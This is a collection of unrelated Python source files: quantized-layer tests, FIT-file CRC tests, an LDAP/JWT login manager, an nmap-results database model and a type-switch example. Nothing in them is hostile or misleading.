'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_quantizer': 'quantized_bits(2,0,alpha=1.0)',
'bias_quantizer': 'quantized_bits(2,0)',
},
np.array([[1, 1, 1, 1]], dtype=K.floatx()),
np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
dtype=K.floatx()), # weight_data
np.array([0, 0], dtype=K.floatx()), # bias
np.array([[2, 2]], dtype=K.floatx())), #expected_output
])
def test_qdense(layer_kwargs, input_data, weight_data, bias_data,
expected_output):
qdense_util(
layer_cls=QDense,
kwargs=layer_kwargs,
input_data=input_data,
weight_data=[weight_data, bias_data],
expected_output=expected_output)
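# --- Hedged sketch (not part of the original tests) ---------------------------
# Rough illustration of why the quantized case above expects [[2, 2]]: with
# quantized_bits(2, 0, alpha=1.0) the 10/20 weights saturate at the largest
# representable level, and 4 unit inputs times that level must give 2.0, i.e.
# a level of 0.5. Printing rather than asserting keeps this non-authoritative.
def manual_quantizer_check():
    q = quantized_bits(2, 0, alpha=1.0)
    w = np.array([[10., 20.], [10., 20.], [10., 20.], [10., 20.]])
    print(K.eval(q(K.constant(w))))  # expected to show the saturated levels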
if __name__ == '__main__':
pytest.main([__file__])
|
tests/test_records.py | tomfallen/python-fitparse | 548 | 30935 | #!/usr/bin/env python
import sys
from fitparse.records import Crc
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
class RecordsTestCase(unittest.TestCase):
def test_crc(self):
crc = Crc()
self.assertEqual(0, crc.value)
crc.update(b'\x0e\x10\x98\x00(\x00\x00\x00.FIT')
self.assertEqual(0xace7, crc.value)
# 0 must not change the crc
crc.update(0)
self.assertEqual(0xace7, crc.value)
def test_crc_format(self):
self.assertEqual('0x0000', Crc.format(0))
self.assertEqual('0x12AB', Crc.format(0x12AB))
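# --- Hedged sketch (not part of the original tests) ---------------------------
# Illustrates the streaming use suggested by test_crc: feeding the same bytes
# in chunks should yield the same running checksum, e.g.
# crc_of_chunks([b'\x0e\x10\x98\x00', b'(\x00\x00\x00.FIT']) should be 0xace7.
# Only the API exercised above (Crc(), update(), .value) is assumed.
def crc_of_chunks(chunks):
    crc = Crc()
    for chunk in chunks:
        crc.update(chunk)
    return crc.value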
if __name__ == '__main__':
unittest.main()
|
backend/lost/api/user/login_manager.py | JonasGoebel/lost | 490 | 30941 | import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
        return user
|
pipeline/models/nmap_model.py | ponderng/recon-pipeline | 352 | 30971 | <reponame>ponderng/recon-pipeline<filename>pipeline/models/nmap_model.py
import textwrap
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, String, Boolean
from .base_model import Base
from .port_model import Port
from .ip_address_model import IPAddress
from .nse_model import nse_result_association_table
class NmapResult(Base):
""" Database model that describes the TARGET.nmap scan results.
Represents nmap data.
Relationships:
``target``: many to one -> :class:`pipeline.models.target_model.Target`
``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress`
``port``: one to one -> :class:`pipeline.models.port_model.Port`
``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult`
"""
def __str__(self):
return self.pretty()
def pretty(self, commandline=False, nse_results=None):
pad = " "
ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address
msg = f"{ip_address} - {self.service}\n"
msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n"
msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n"
msg += f"product: {self.product} :: {self.product_version}\n"
msg += "nse script(s) output:\n"
if nse_results is None:
# add all nse scripts
for nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
else:
# filter used, only return those specified
for nse_result in nse_results:
if nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
if commandline:
msg += "command used:\n"
msg += f"{pad}{self.commandline}\n"
return msg
__tablename__ = "nmap_result"
id = Column(Integer, primary_key=True)
open = Column(Boolean)
reason = Column(String)
service = Column(String)
product = Column(String)
commandline = Column(String)
product_version = Column(String)
port = relationship(Port)
port_id = Column(Integer, ForeignKey("port.id"))
ip_address = relationship(IPAddress)
ip_address_id = Column(Integer, ForeignKey("ip_address.id"))
target_id = Column(Integer, ForeignKey("target.id"))
target = relationship("Target", back_populates="nmap_results")
nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
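# --- Hedged usage sketch (not part of the original module) -------------------
# Shows how NmapResult rows might be queried once a populated database exists.
# The SQLite path is an assumption, no tables are created here, and the
# pipeline's other model modules (e.g. Target, NSEResult) must already be
# imported so the string-based ORM relationships resolve.
if __name__ == "__main__":
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine("sqlite:////tmp/recon-pipeline-example.sqlite")
    session = sessionmaker(bind=engine)()
    # Reuse the model's own pretty() helper for every open-port result.
    for result in session.query(NmapResult).filter(NmapResult.open.is_(True)):
        print(result.pretty(commandline=True))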
|
examples/isinstance.py | quynhanh-ngx/pytago | 206 | 30972 | def main():
a = ["a", 1, "5", 2.3, 1.2j]
some_condition = True
for x in a:
# If it's all isinstance, we can use a type switch
if isinstance(x, (str, float)):
print("String or float!")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!")
print(":)")
# If it's got mixed expressions, we will inline a switch for the isinstance expression
if isinstance(x, str) and some_condition:
print("String")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!!")
print(":O")
if __name__ == '__main__':
main()
|